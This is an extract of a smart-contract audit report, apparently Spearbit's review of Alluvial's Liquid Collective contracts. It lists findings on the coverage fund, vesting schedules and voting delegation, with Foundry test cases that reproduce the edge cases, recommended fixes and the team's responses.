(NXM) and possibly other actors to cover for slashing losses. Each time Liquid Collective adds a validator key to the system, we will submit the key to NXM so they can monitor it and cover it in case of slashing. In case one of the validator's keys gets slashed (slashing being defined according to NXM policy), NXM will reimburse part or all of the lost ETH. The period between when the slashing event occurs and when the reimbursement happens can range from 30 days up to 365 days. The reimbursement will go to the CoverageFund contract and subsequently be pulled into the core system respecting maximum bounds. • Sequence of operations: 1. Liquid Collective submits a validator key to NXM to be covered. 2.
A slashing event occurs (e.g. a validator key gets slashed 1 ETH). 3. NXM monitoring catches the slashing event. 4. 30 days to 365 days later, NXM reimburses 1 ETH to the CoverageFund. 5. 1 ETH gets progressively pulled from the CoverageFund into River respecting the bounds. Spearbit: Acknowledged. As discussed with the Alluvial team, the impact of this issue is limited since the coverage fund should hold ETH only in case of a slashing event.
+7.2.2 Consider preventing CoverageFundAddress to be set as address(0) Severity: Medium Risk Context: • River.1.sol#L176 • CoverageFundAddress.sol#L21 Description: In the current implementation of River.setCoverageFund and CoverageFundAddress.set, both functions do not revert when the _newCoverageFund address parameter is equal to address(0). If the coverage fund address is empty, the River._pullCoverageFunds function will return early and will not pull any coverage funds. Recommendation: If having an empty coverage fund address equal to address(0) is the intended behavior, we suggest explaining the reason in both the documentation and natspec comments and documenting in which scenario this could happen. Otherwise, add a sanity check on the new address inside the CoverageFundAddress.set function and revert in case _newValue == address(0). Alluvial: Added sanity check inside the CoverageFundAddress.set function in PR 169. Spearbit: Acknowledged.
7.3 Low Risk
+7.3.1 CoverageFund.initCoverageFundV1 might be front-runnable Severity: Low Risk Context: CoverageFund.1.sol#L21 Description: Upgradeable contracts are used in the project, mostly relying on a TUPProxy contract. Initializing a contract is a two-phase process where the first call is the actual deployment and the second call is a call to the init function itself. From our experience with the repository, the upgradeable contracts' deployment scripts are using the TUPProxy correctly; however, in this case we were not able to find the deployment script for CoverageFund, so we decided to raise this point to make sure you are following the previous policy also for this contract. Recommendation: Use the same structure of deployment scripts that are used in other upgradeable contracts also for CoverageFund to make sure that the initialization process is atomic (i.e. executed in a single transaction). Alluvial: Recommendation implemented in PR 170. Spearbit: Acknowledged.
+7.3.2 Account owner of the minted TLC tokens must call delegate to own vote power of initial minted tokens Severity: Low Risk Context: TLC.1.sol#L20 Description: The _account owner of the minted TLC tokens must remember to call tlcToken.delegate(accountOwner) to auto-delegate to itself, otherwise it will have zero voting power. Without doing that, anyone (even with just 1 voting power) could make any proposal pass and in the future manage the DAO, proposing, rejecting, or accepting/executing proposals. As the OpenZeppelin ERC20 documentation says: By default, token balance does not account for voting power. This makes transfers cheaper. The downside is that it requires users to delegate to themselves in order to activate checkpoints and have their voting power tracked. Recommendation: Remember to call tlcToken.delegate(accountOwner) after the deployment of the TLC token.
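A minimal Foundry-style sketch of that step, mirroring the tests used elsewhere in this report and assuming the same TLCV1 interface (the test and account names are illustrative):

//SPDX-License-Identifier: MIT
pragma solidity 0.8.10;

import "forge-std/Test.sol";
import "../src/TLC.1.sol";

contract DelegationSketch is Test {
    function testSelfDelegationActivatesVotingPower() public {
        address accountOwner = makeAddr("owner");
        TLCV1 tlc = new TLCV1();
        tlc.initTLCV1(accountOwner); // mints the initial supply to accountOwner

        // Balance alone carries no voting power...
        assertEq(tlc.getVotes(accountOwner), 0);

        // ...until the owner self-delegates, activating the vote checkpoints.
        vm.prank(accountOwner);
        tlc.delegate(accountOwner);
        assertEq(tlc.getVotes(accountOwner), tlc.balanceOf(accountOwner));
    }
}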
7.4 Gas Optimization
+7.4.1 Consider using an unchecked block to save some gas Severity: Gas Optimization Context: ERC20VestableVotesUpgradeable.1.sol#L354-L356 Description: Because of the if statement, it is impossible for vestedAmount - releasedAmount to underflow, thus allowing the usage of an unchecked block to save a bit of gas. Recommendation: Consider implementing the code snippet below:
  if (vestedAmount > releasedAmount) {
-     return vestedAmount - releasedAmount;
+     unchecked {
+         return vestedAmount - releasedAmount;
+     }
  }
• Gas diff: testReleaseVestingScheduleAfterLockDuration() (gas: -65 (-0.023%)) testReleaseVestingScheduleAtLockDuration() (gas: -65 (-0.023%)) testRevokeAtCliff() (gas: -65 (-0.025%)) testRevokeDefault() (gas: -65 (-0.025%)) testRevokeTwiceAfterEnd() (gas: -65 (-0.026%)) testReleaseVestingScheduleAfterRevoke() (gas: -130 (-0.044%)) testRevokeTwice() (gas: -130 (-0.048%)) testcomputeVestingAmounts() (gas: -195 (-0.059%)) testVestingScheduleFuzzing(uint24,uint32,uint8,uint8,uint256,uint256,uint256) (gas: -1732 (-0.595%)) Overall gas change: -2512 (-0.869%) Alluvial: Recommendation implemented in PR 172. Spearbit: Fixed.
7.5 Informational
+7.5.1 createVestingSchedule allows the creation of a vesting schedule that could release zero tokens after a period has passed Severity: Informational Context: ERC20VestableVotesUpgradeable.1.sol#L368-L387 Description: Depending on the value of duration or amount, it is possible to create a vesting schedule that would release zero tokens after a whole period has elapsed. This is an edge-case scenario but would still be possible, given that createVestingSchedule can be called by anyone and not only Alluvial. See the following test case for an example: //SPDX-License-Identifier: MIT pragma solidity 0.8.10; import "forge-std/Test.sol"; import "../src/TLC.1.sol"; contract WrappedTLC is TLCV1 { function deterministicVestingEscrow(uint256 _index) external view returns (address escrow) { return _deterministicVestingEscrow(_index); } } contract SpearVestTest is Test { WrappedTLC internal tlc; address internal escrowImplem; address internal initAccount; address internal bob; address internal alice; address internal carl; function setUp() public { initAccount = makeAddr("init"); bob = makeAddr("bob"); alice = makeAddr("alice"); carl = makeAddr("carl"); tlc = new WrappedTLC(); tlc.initTLCV1(initAccount); } function testDistributeZeroPerPeriod() public { // create a vesting schedule for Alice vm.prank(initAccount); createVestingSchedule( VestingSchedule({ start: block.timestamp, cliffDuration: 0 days, lockDuration: 0, duration: 365 days, period: 1 days, amount: 100, beneficiary: alice, delegatee: address(0), revocable: true }) ); // One whole period passes and Alice checks how many tokens she can release vm.warp(block.timestamp + 1 days); uint256 releasable = tlc.computeVestingReleasableAmount(0); assertEq(releasable, 0); } struct VestingSchedule { uint256 start; uint256 cliffDuration; uint256 lockDuration; uint256 duration; uint256 period; uint256 amount; address beneficiary; address delegatee; bool revocable; } function createVestingSchedule(VestingSchedule memory config) internal returns (uint256) { return createVestingScheduleStackOptimized(config); } function createVestingScheduleStackOptimized(VestingSchedule memory config) internal returns (uint256) {
return tlc.createVestingSchedule( uint64(config.start), uint32(config.cliffDuration), uint32(config.duration), uint32(config.period), uint32(config.lockDuration), config.revocable, config.amount, config.beneficiary, config.delegatee ); } } Recommendation: Consider preventing the TLC owner from creating such vesting schedules, or add another check that would revert the creation of a vesting schedule if the amount of releasable tokens for each period is equal to zero. Alluvial: Recommendation has been implemented in PR 172. Spearbit: Fixed.
+7.5.2 CoverageFund - Checks-Effects-Interactions best practice is violated Severity: Informational Context: CoverageFund.1.sol#L35, CoverageFund.1.sol#L43 Description: We were not able to find any concrete instances of harmful reentrancy attack vectors in this contract, but it is recommended to follow the Checks-Effects-Interactions pattern anyway. Recommendation: Consider moving the "effects" (code lines that modify the storage) right before the "interactions" (external calls). Alluvial: Fixed in PR 168 by implementing the auditor's recommendation. Spearbit: Fixed.
+7.5.3 River contract allows setting an empty metadata URI Severity: Informational Context: River.1.sol#L181-L184, MetadataURI.sol#L33-L44 Description: The current implementation of River.setMetadataURI and MetadataURI.set both allow the current value of the metadata URI to be updated to an empty string. Recommendation: Consider adding a check inside MetadataURI.set (to follow the current project style) to revert in case _newValue is an empty string. Alluvial: Recommendation implemented in PR 167. Spearbit: Fixed.
+7.5.4 Consider requiring that the _cliffDuration is a multiple of _period Severity: Informational Context: ERC20VestableVotesUpgradeable.1.sol#L158-L236 Description: When a vesting schedule is created via _createVestingSchedule, the only check made on the _period parameter (other than being greater than zero) is that the _duration must be a multiple of _period. If after the _cliffDuration the user can already release the matured vested tokens, it could make sense to also require that _cliffDuration % _period == 0 (a sketch of such checks follows 7.5.5 below). Recommendation: Consider requiring that _cliffDuration % _period == 0 when a vesting schedule is created. Alluvial: Recommendation has been implemented in PR 172. Spearbit: Fixed.
+7.5.5 Add documentation about the scenario where a vesting schedule can be created in the past Severity: Informational Context: ERC20VestableVotesUpgradeable.1.sol#L200-L202 Description: In the current implementation of the ERC20VestableVotesUpgradeable _createVestingSchedule function, there is no check on the _start value. This means that the creator of a vesting schedule could create a schedule that starts in the past. Allowing the creation of a vesting schedule with a past _start also influences the behavior of _revokeVestingSchedule (see ERC20VestableVotesUpgradeableV1 createVestingSchedule allows the creation of vesting schedules that have already ended and cannot be revoked). Recommendation: Consider documenting this behavior and the reason to allow vesting schedules with _start < block.timestamp. Alluvial: The behavior has been documented in PR 172. Spearbit: Fixed.
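To make the check discussed in 7.5.4 concrete, here is a hedged sketch that mirrors the _createVestingSchedule parameter naming; this is not the PR 172 implementation:

pragma solidity 0.8.10;

// Sketch only: parameter checks that keep both the total duration and the cliff
// aligned to period boundaries. The error name mirrors the existing one.
contract VestingParamChecksSketch {
    error InvalidVestingScheduleParameter(string reason);

    function _checkDurations(uint32 _cliffDuration, uint32 _duration, uint32 _period) internal pure {
        if (_period == 0) revert InvalidVestingScheduleParameter("Period must be greater than zero");
        // Existing check: the duration must be a multiple of the period.
        if (_duration % _period != 0) {
            revert InvalidVestingScheduleParameter("Duration must be a multiple of the period");
        }
        // Suggested addition (7.5.4): the cliff should also land exactly on a period boundary.
        if (_cliffDuration % _period != 0) {
            revert InvalidVestingScheduleParameter("Cliff duration must be a multiple of the period");
        }
    }
}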
+7.5.6 ERC20VestableVotesUpgradeableV1 createVestingSchedule allows the creation of vesting schedules that have already ended and cannot be revoked Severity: Informational Context: ERC20VestableVotesUpgradeable.1.sol#L158-L236, ERC20VestableVotesUpgradeable.1.sol#L243-L258 Description: The current implementation of _createVestingSchedule allows the creation of vesting schedules that: • Start in the past: _start < block.timestamp. • Have already ended: _start + _duration < block.timestamp. Because of this behavior, in case of the creation of a past vesting schedule that has already ended: • The _beneficiary can instantly call (if there's no lock period) releaseVestingSchedule to release the whole amount of tokens. • The creator of the vesting schedule cannot call revokeVestingSchedule because the new end would be in the past and the transaction would revert with an InvalidRevokedVestingScheduleEnd error. The second scenario is particularly important because it does not allow the creator to reduce the length or remove the schedule entirely in case the schedule has been created mistakenly or with a misconfiguration (too many tokens vested, lock period too long, etc.). Recommendation: Consider changing the behavior of _createVestingSchedule to at least prevent the creation of vesting schedules that have already ended because _start + _duration < block.timestamp. Spearbit: Alluvial acknowledges the behavior with PR 172.
+7.5.7 getVestingSchedule returns misleading information if the vesting token creator revokes the schedule Severity: Informational Context: ERC20VestableVotesUpgradeable.1.sol#L71-L73 Description: The getVestingSchedule function returns the information about the created vesting schedule. The duration represents the number of seconds of the vesting period and the amount represents the number of tokens that have been scheduled to be released after the period's end (or after lockDuration if it has been configured to be greater than end). If the creator of the vesting schedule calls revokeVestingSchedule, only the end of the vesting schedule struct will be updated. If external contracts or dApps rely only on the getVestingSchedule information, there could be scenarios where they display or base their logic on wrong information. Consider the following example. Alluvial creates a vesting schedule for alice with the following config:
Another possible solution is to be very explicit on the meaning of each attribute, declaring that those are not real- time values but just the configuration used at the creation of the vesting schedule and that only the end attribute can change when revokeVestingSchedule is called. Alluvial should anyway take care to extensively document which is the best practice for a user, external contract or dApps to query the TLC contracts to gather the correct and up-to-date information relative to a vesting schedule. Spearbit: Alluvial has extended the natspec documentation of getVestingSchedule in PR 172 explaining that only the end field is updating when a schedule is revoked. No changes have been made to the getVestingSchedule code. +7.5.8 The computeVestingVestedAmount will return the wrong amount of vested tokens if the creator of the vested schedule revokes the schedule Severity: Informational Context: • ERC20VestableVotesUpgradeable.1.sol#L100-L103 • ERC20VestableVotesUpgradeable.1.sol#L368-L387 Description: The computeVestingVestedAmount will return the wrong amount of vested tokens if the creator of the vested schedule revokes the schedule. This function returns the value returned by _computeVestedAmount that relies on duration and amount while the only attribute changed by revokeVestingSchedule is the end. 19 function _computeVestedAmount(VestingSchedules.VestingSchedule memory _vestingSchedule, uint256 _time) internal pure returns (uint256) { if (_time < _vestingSchedule.start + _vestingSchedule.cliffDuration) { // pre-cliff no tokens have been vested return 0; } else if (_time >= _vestingSchedule.start + _vestingSchedule.duration) { // post vesting all tokens have been vested return _vestingSchedule.amount; } else { uint256 timeFromStart = _time - _vestingSchedule.start; // compute tokens vested for completly elapsed periods uint256 vestedDuration = timeFromStart - (timeFromStart % _vestingSchedule.period); return (vestedDuration * _vestingSchedule.amount) / _vestingSchedule.duration; } } If the creator revokes the schedule, the computeVestingVestedAmount would return more tokens compared to the amount that the user has vested in reality. Consider the following example. Alluvial creates a vesting schedule with the following config { } "start": block.timestamp, "cliffDuration": 1 days, "lockDuration": 0, "duration": 10 days, "period": 1 days, "amount": 10, "beneficiary": alice, "delegatee": alice, "revocable": true Alluvial then calls revokeVestingSchedule(0, uint64(block.timestamp + 5 days));. The effect of this trans- action would return 5 tokens to Alluvial and set the new end to block.timestamp + 5 days. If alice calls computeVestingVestedAmount(0) at the time uint64(block.timestamp + 7 days), it would return 7 because _computeVestedAmount would execute the code in the else branch. But alice cannot have more than 5 vested tokens because of the previous revoke. If alice calls computeVestingVestedAmount(0) at the time uint64(block.timestamp + duration)it would return 10 because _computeVestedAmount would execute the code in the else if (_time >= _vestingSchedule.start + _vestingSchedule.duration) branch. But alice cannot have more than 5 vested tokens because of the previous revoke. Attached test below to reproduce it: //SPDX-License-Identifier: MIT pragma solidity 0.8.10; import "forge-std/Test.sol"; import "../src/TLC.1.sol"; contract WrappedTLC is TLCV1 { 20 function __computeVestingReleasableAmount(uint256 vestingID, uint256 _time) external view returns (uint256) { ,! 
return _computeVestingReleasableAmount( VestingSchedules.get(vestingID), _deterministicVestingEscrow(vestingID), _time ); } } contract SpearTLCTest is Test { WrappedTLC internal tlc; address internal escrowImplem; address internal initAccount; address internal creator; address internal bob; address internal alice; address internal carl; function setUp() public { initAccount = makeAddr("init"); creator = makeAddr("creator"); bob = makeAddr("bob"); alice = makeAddr("alice"); carl = makeAddr("carl"); tlc = new WrappedTLC(); tlc.initTLCV1(initAccount); } function testIncorrectComputeVestingVestedAmount() public { vm.prank(initAccount); tlc.transfer(creator, 10); // create a vesting schedule for Alice vm.prank(creator); createVestingSchedule( VestingSchedule({ start: block.timestamp, cliffDuration: 0 days, lockDuration: 0, duration: 10 days, period: 1 days, amount: 10, beneficiary: alice, delegatee: address(0), revocable: true }) ); // creator calls revokeVestingSchedule, revoking the vested schedule and setting the new end at half of the duration // 5 tokens are returned to the creator and `end` is updated to the new value // this also means that at max Alice will have 5 tokens vested (and releasable) vm.prank(creator); tlc.revokeVestingSchedule(0, uint64(block.timestamp + 5 days)); // We warp to day 7 of the schedule vm.warp(block.timestamp + 7 days); // This should fail because Alice at max has only 5 tokens vested because of the revoke assertEq(tlc.computeVestingVestedAmount(0), 7); // We warp to day 10 (we reached the total duration of the vesting) vm.warp(block.timestamp + 3 days); // This should fail because Alice at max has only 5 tokens vested because of the revoke assertEq(tlc.computeVestingVestedAmount(0), 10); } struct VestingSchedule { uint256 start; uint256 cliffDuration; uint256 lockDuration; uint256 duration; uint256 period; uint256 amount; address beneficiary; address delegatee; bool revocable; } function createVestingSchedule(VestingSchedule memory config) internal returns (uint256) { return createVestingScheduleStackOptimized(config); } function createVestingScheduleStackOptimized(VestingSchedule memory config) internal returns (uint256) { return tlc.createVestingSchedule( uint64(config.start), uint32(config.cliffDuration), uint32(config.duration), uint32(config.period), uint32(config.lockDuration), config.revocable, config.amount, config.beneficiary, config.delegatee ); } } Recommendation: Consider refactoring the code inside computeVestingVestedAmount to correctly handle the scenario where the vesting schedule has been revoked. Alluvial: Recommendation has been implemented in PR 172. Spearbit: Acknowledged.
+7.5.9 Consider writing clear documentation on how voting power and delegation work Severity: Informational Context: ERC20VestableVotesUpgradeable.1.sol Description: ERC20VestableVotesUpgradeableV1 is an extension of the OpenZeppelin ERC20VotesUpgradeable contract. As the official OpenZeppelin documentation says (also reported in Alluvial's natspec): By default, token balance does not account for voting power. This makes transfers cheaper. The downside is that it requires users to delegate to themselves in order to activate checkpoints and have their voting power tracked. Because the way ERC20VotesUpgradeable behaves on voting power and delegation of voting power could be counterintuitive for normal users who are not aware of it, Alluvial should be very explicit on how users should act when a vesting schedule is created for them.
When a Vote Token is transferred, ERC20VotesUpgradeable calls the hook _afterTokenTransfer: function _afterTokenTransfer( address from, address to, uint256 amount ) internal virtual override { super._afterTokenTransfer(from, to, amount); _moveVotingPower(delegates(from), delegates(to), amount); } In this case, _moveVotingPower(delegates(from), delegates(to), amount); will decrease the voting power of delegates(from) by amount and will increase the voting power of delegates(to) by amount. This applies if some conditions are true, which you can see here: function _moveVotingPower( address src, address dst, uint256 amount ) private { if (src != dst && amount > 0) { if (src != address(0)) { (uint256 oldWeight, uint256 newWeight) = _writeCheckpoint(_checkpoints[src], _subtract, amount); emit DelegateVotesChanged(src, oldWeight, newWeight); } if (dst != address(0)) { (uint256 oldWeight, uint256 newWeight) = _writeCheckpoint(_checkpoints[dst], _add, amount); emit DelegateVotesChanged(dst, oldWeight, newWeight); } } } When a vesting schedule is created, the creator has two options: 1) Specify a custom delegatee different from the beneficiary (or equal to it, but that is the same as option 2). 2) Leave the delegatee empty (equal to address(0)). • Scenario 1) empty delegatee OR delegatee === beneficiary (same thing): after creating the vesting schedule, the voting power of the beneficiary will be equal to the amount of tokens vested. If the beneficiary did not call tlc.delegate(beneficiary) previously, after releasing some tokens, its voting power will be decreased by the amount of released tokens. • Scenario 2) delegatee !== beneficiary && delegatee !== address(0): same thing as before, but now we have two different actors, one is the beneficiary and another one is the delegatee of the voting power of the vested tokens. If the beneficiary did not call tlc.delegate(vestingScheduleDelegatee) previously, after releasing some tokens, the voting power of the current vested schedule's delegatee will be decreased by the amount of released tokens. • Related test for scenario 1: //SPDX-License-Identifier: MIT pragma solidity 0.8.10; import "forge-std/Test.sol"; import "../src/TLC.1.sol"; contract WrappedTLC is TLCV1 { function deterministicVestingEscrow(uint256 _index) external view returns (address escrow) { return _deterministicVestingEscrow(_index); } } contract SpearTLCTest is Test { WrappedTLC internal tlc; address internal escrowImplem; address internal initAccount; address internal bob; address internal alice; address internal carl; function setUp() public { initAccount = makeAddr("init"); bob = makeAddr("bob"); alice = makeAddr("alice"); carl = makeAddr("carl"); tlc = new WrappedTLC(); tlc.initTLCV1(initAccount); } function testLosingPowerAfterRelease() public { // create a vesting schedule for Alice vm.prank(initAccount); createVestingSchedule( VestingSchedule({ start: block.timestamp, cliffDuration: 1 days, lockDuration: 0, // no lock duration: 10 days, period: 1 days, amount: 10, beneficiary: alice, delegatee: address(0), revocable: false }) ); address aliceEscrow = tlc.deterministicVestingEscrow(0); assertEq(tlc.getVotes(alice), 10); assertEq(tlc.balanceOf(alice), 0); // Cliff period has passed and Alice tries to get the first batch of the vested tokens vm.warp(block.timestamp + 1 days); vm.prank(alice); tlc.releaseVestingSchedule(0); // Alice now owns the vested tokens just released, but her voting power has decreased by the
amount released assertEq(tlc.getVotes(alice), 9); assertEq(tlc.balanceOf(alice), 1); } struct VestingSchedule { uint256 start; uint256 cliffDuration; uint256 lockDuration; uint256 duration; uint256 period; uint256 amount; address beneficiary; address delegatee; bool revocable; } function createVestingSchedule(VestingSchedule memory config) internal returns (uint256) { return createVestingScheduleStackOptimized(config); } function createVestingScheduleStackOptimized(VestingSchedule memory config) internal returns (uint256) { return tlc.createVestingSchedule( uint64(config.start), uint32(config.cliffDuration), uint32(config.duration), uint32(config.period), uint32(config.lockDuration), config.revocable, config.amount, config.beneficiary, config.delegatee ); } } Recommendation: Consider writing clear documentation on how voting power and delegation work, explaining how both the beneficiary and the delegatee of the vested schedule should act to prevent decreasing their voting power when vested tokens are released or transferred. Alluvial: Recommendation has been implemented in PR 172. Spearbit: Fixed.
+7.5.10 Fix mismatch between revert error message and code behavior Severity: Informational Context: ERC20VestableVotesUpgradeable.1.sol#L196 Description: The error message requires the schedule duration to be greater than the cliff duration, but the code allows it to be greater than or equal to the cliff duration. Recommendation: Update the condition to match the error or vice versa:
- if (_cliffDuration > _duration) {
+ if (_cliffDuration >= _duration) {
or
- revert InvalidVestingScheduleParameter("Vesting schedule duration must be greater than the cliff duration");
+ revert InvalidVestingScheduleParameter("Vesting schedule duration must be greater than or equal to the cliff duration");
Alluvial: Code behavior is correct, updated the error message in PR 172. Spearbit: Fixed.
+7.5.11 Improve documentation and naming of period variable Severity: Informational Context: VestingSchedules.sol#L24 Description: Similar to "Consider renaming period to periodDuration to be more descriptive", the variable name and documentation are ambiguous. We can give a more descriptive name to the variable and fix the documentation. Recommendation: Change the variable to periodDuration and improve the documentation on both:
  struct VestingSchedule {
      ...
-     // duration of the vesting period in seconds
-     uint32 duration;
-     // duration of a vesting period in seconds
-     uint32 period;
+     // duration of the entire vesting (sum of all vesting period durations)
+     uint32 duration;
+     // duration of a single period of vesting
+     uint32 periodDuration;
      // amount of tokens granted by the vesting schedule
      ...
  }
Alluvial: Recommendation implemented in PR 172. Spearbit: Fixed.
+7.5.12 Consider renaming period to periodDuration to be more descriptive Severity: Informational Context: ERC20VestableVotesUpgradeable.1.sol#L153 Description: period can be confused with (for example) a counter or an id. Recommendation: Rename it to something more descriptive like periodDuration. Alluvial: Recommendation implemented in PR 172. Spearbit: Fixed.
+7.5.13 Coverage funds might be left stuck in the contract Severity: Informational Context: OracleManager.1.sol#L79, Oracle.1.sol#L416 Description: The newly introduced coverage fund is a smart contract that holds ETH to cover a potential lsETH price decrease due to unexpected slashing events.
Funds might be pulled from CoverageFundV1 to the River contract through setConsensusLayerData to cover the losses and keep the share price stable. _sanityChecks will revert if a major loss is reported in a single transaction, since the absolute difference between prevTotalEth and postTotalEth may be greater than the allowed value. Therefore, oracles will have to report this loss gradually using multiple calls to reportConsensusLayerData, which will potentially cover a portion of the loss in each transaction by pulling that portion from the coverage fund. The coverage fund is an on-demand source of liquidity. Funds will be deposited to the CoverageFundV1 (and will be claimable by the River contract) only after a scrutiny process that makes sure the loss event matches the insurance policy. Thus, it may take a while for funds to be deposited to the CoverageFundV1 contract after a slashing event has occurred. The call to _pullCoverageFunds will not revert in the case where the required amount was not eventually pulled; rather, the execution will continue, and by the end of the transaction CLValidatorTotalBalance will hold the value of _validatorTotalBalance that reflects the already decreased value. The issue arises if the stream of loss transactions (calls to reportConsensusLayerData) is processed and executed before the coverage fund is loaded with ETH. Since the total loss is not accumulated, it may lead to funds that are left stuck in the CoverageFundV1 contract which cannot be claimed by the River contract, leaving the lsETH price low. Consider the following example: DepositedValidatorCount = 2 (2 active validators), CLValidatorTotalBalance = 64, relativeLowerBound = annualAprUpperBound = 500 (5%), ELFees = 0 (just for simplicity), no funds yet in the coverage fund, and assuming no new deposits to the River contract. • On T0 a slashing of 14 ETH occurred, leaving only 50 ETH in CL. Now oracles cannot report the entire loss, due to the way _sanityChecks works. Oracles can only report a loss of 64*0.05 = 3.2 ETH in the first _pushToRiver transaction. • On T1 _pushToRiver is called with _totalBalance = 64 - 3.2 = 60.8 ETH. Assuming executionLayerFees = 0, setConsensusLayerData will try to pull _maxIncrease + 3.2 from the coverage fund, but since there are no funds there, the transaction will end up with CLValidatorTotalBalance = 60.8 ETH. • On T2 _pushToRiver is called again, this time with _totalBalance = 60.8 - 3.04 = 57.76 ETH. Assuming executionLayerFees = 0, setConsensusLayerData will try to pull _maxIncrease + 3.04 from the coverage fund, but since there are no funds there, the transaction will end up with CLValidatorTotalBalance = 57.76 ETH. • On T3 14 ETH are eventually transferred to the coverage fund contract. • On T4 _pushToRiver is called again, this time with _totalBalance = 57.76 * 0.95 = 54.872 ETH. Assuming T4-T2 = 384 seconds, maxIncrease = 57.76 * 0.05 * 384 / 31536000 ~ 0, executionLayerFees = 0, setConsensusLayerData will try to pull _maxIncrease + 2.888 ~ 2.88, this time successfully. The transaction will end up with CLValidatorTotalBalance = 57.76 ETH, CoverageFundV1.balance = 14 - 2.88 = 11.12 ETH. Assuming the rest of the _pushToRiver transactions succeed, eventually only 57.76 - 50 = 7.76 ETH will be claimed from the coverage fund by the River contract, leaving the remaining 14 - 7.76 = 6.24 ETH stuck in the coverage fund contract.
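For reference, the per-report bound used in the arithmetic above can be sketched as follows; the formula is an assumption inferred from the 57.76 * 0.05 * 384 / 31536000 computation in the example, not the actual River code:

pragma solidity 0.8.10;

// Sketch: the allowed balance increase is the annual APR upper bound (in basis
// points over an assumed BASE of 10_000, so 500 => 5%) prorated over the time
// elapsed since the previous oracle report.
contract MaxIncreaseSketch {
    uint256 internal constant BASE = 10_000;

    function maxIncrease(uint256 _prevTotalEth, uint256 _annualAprUpperBound, uint256 _timeElapsed)
        external
        pure
        returns (uint256)
    {
        return (_prevTotalEth * _annualAprUpperBound * _timeElapsed) / (BASE * 365 days);
    }
}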
Spearbit: Acknowledged. As communicated with the Alluvial team, this issue is less probable since the system is not going to be used in the way described above, i.e., reporting a slashing loss is not intended to be a gradual process; rather, the loss should be reported once coverage funds are ready to be pulled. However, we still want to emphasize that the issue is possible in certain edge-case scenarios.
+7.5.14 Consider removing coverageFunds variable and explicitly initialize executionLayerFees to zero
Severity: Informational
Context: OracleManager.1.sol#L100-L101
Description: Inside OracleManager.setConsensusLayerData the coverageFunds variable is declared but never used. Consider cleaning the code by removing the unused variable. The executionLayerFees variable instead should be explicitly initialized to zero to not rely on compiler assumptions.
Recommendation: Consider removing the coverageFunds variable and explicitly initializing executionLayerFees to zero.
Alluvial: Recommendation has been implemented in PR 168.
Spearbit: Fixed.
+7.5.15 Consider renaming IVestingScheduleManagerV1 interface to IERC20VestableVotesUpgradeableV1
Severity: Informational
Context: IVestingScheduleManager.1.sol
Description: The IVestingScheduleManager interface contains all the events, errors, and functions that ERC20VestableVotesUpgradeableV1 needs to implement and use. Because there's no corresponding VestingScheduleManager contract implementation, it would make sense to rename the interface to IERC20VestableVotesUpgradeableV1.
Recommendation: Consider renaming the IVestingScheduleManagerV1 interface to IERC20VestableVotesUpgradeableV1.
Alluvial: Recommendation has been implemented in PR 172.
Spearbit: Fixed.
+7.5.16 Consider renaming CoverageFundAddress's COVERAGE_FUND_ADDRESS to be consistent with the current naming convention
Severity: Informational
Context: CoverageFundAddress.sol#L10
Description: Consider renaming the constant used to access the unstructured storage slot, COVERAGE_FUND_ADDRESS. To follow the naming convention already adopted across all the contracts, the variable should be renamed to COVERAGE_FUND_ADDRESS_SLOT.
Recommendation: Consider renaming COVERAGE_FUND_ADDRESS in CoverageFundAddress to COVERAGE_FUND_ADDRESS_SLOT to be consistent with the already adopted naming convention.
Alluvial: Recommendation has been implemented in PR 168.
Spearbit: Fixed.
+7.5.17 Consider reverting if the msg.value is zero in CoverageFundV1.donate
Severity: Informational
Context: CoverageFund.1.sol#L41-L46
Description: In the current implementation of CoverageFundV1.donate there is no check on the msg.value value. Because of this, the sender can "spam" the function and emit multiple useless Donate events.
Recommendation: Consider reverting early, at the beginning of the function, if msg.value is equal to zero.
Alluvial: Recommendation has been implemented in PR 168.
Spearbit: Fixed.
+7.5.18 Consider having a separate function in River contract that allows CoverageFundV1 to send funds instead of using the same function used by ELFeeRecipientV1
Severity: Informational
Context: CoverageFund.1.sol#L35, River.1.sol#L192-L196
Description: When the River contract calls the CoverageFundV1 contract to pull funds, the CoverageFundV1 sends funds to River by calling IRiverV1(payable(river)).sendELFees{value: amount}();. sendELFees is a function that is currently used by both CoverageFundV1 and ELFeeRecipientV1.
function sendELFees() external payable {
    if (msg.sender != ELFeeRecipientAddress.get() && msg.sender != CoverageFundAddress.get()) {
        revert LibErrors.Unauthorized(msg.sender);
    }
}
It would be cleaner to have a separate function callable only by the CoverageFundV1 contract.
Recommendation: Consider adding to the River contract a separate function that allows the CoverageFundV1 to send ETH. If that function is implemented, remember to also remove the msg.sender != CoverageFundAddress.get() check from the sendELFees implementation.
Alluvial: Recommendation implemented in PR 168.
Spearbit: Fixed.
+7.5.19 Extensively document how the Coverage Funds contract works
Severity: Informational
Context: CoverageFund.1.sol
Description: The Coverage Fund contract has a crucial role inside the Protocol, and the current contract's documentation does not properly cover all the needed aspects. Consider documenting the following aspects:
• General explanation of the Coverage Fund and its purpose.
• Will donations happen only after a slash/penalty event? Or is there a "budget" that will be dumped on the contract regardless of any slashing events?
• If a donation of XXX ETH is made, how is it handled? In a single transaction or distributed over a period of time?
• Explain carefully that when ETH is donated, no shares are minted.
• Explain all the possible market repercussions of the integration of Coverage Funds.
• Is there any off-chain validation process before donating?
• Who are the entities that are enabled to donate to the fund?
• How is the Coverage Fund integrated inside the current Alluvial protocol?
• Any additional information useful for the users, investors, and other actors that interact with the protocol.
Recommendation: Consider extending the current documentation of the CoverageFund contract to deeply explain how the coverage fund works and how it interacts with the whole Protocol.
Alluvial: Natspec extended in PR 168.
Spearbit: Fixed.
+7.5.20 Missing/wrong natspec comment and typos
Severity: Informational
Context:
• IVestingScheduleManager.1.sol#L48
• IVestingScheduleManager.1.sol#L56
• IVestingScheduleManager.1.sol#L77-L98
• IVestingScheduleManager.1.sol#L111-L114
• VestingSchedules.sol#L37
• VestingSchedules.sol#L82
• ERC20VestableVotesUpgradeable.1.sol#L313-L315
• ERC20VestableVotesUpgradeable.1.sol#L334-L335
• ERC20VestableVotesUpgradeable.1.sol#L389
• Oracle.1.sol#L410-L411
• ICoverageFund.1.sol#L17-L18
• VestingSchedules.sol#L19-L20
• VestingSchedules.sol#L11-L33
• ERC20VestableVotesUpgradeable.1.sol#L41-L42
• ERC20VestableVotesUpgradeable.1.sol#L59-L61
• ERC20VestableVotesUpgradeable.1.sol#L147
• ERC20VestableVotesUpgradeable.1.sol#L156
• ERC20VestableVotesUpgradeable.1.sol#L36-L45
Description:
Natspec:
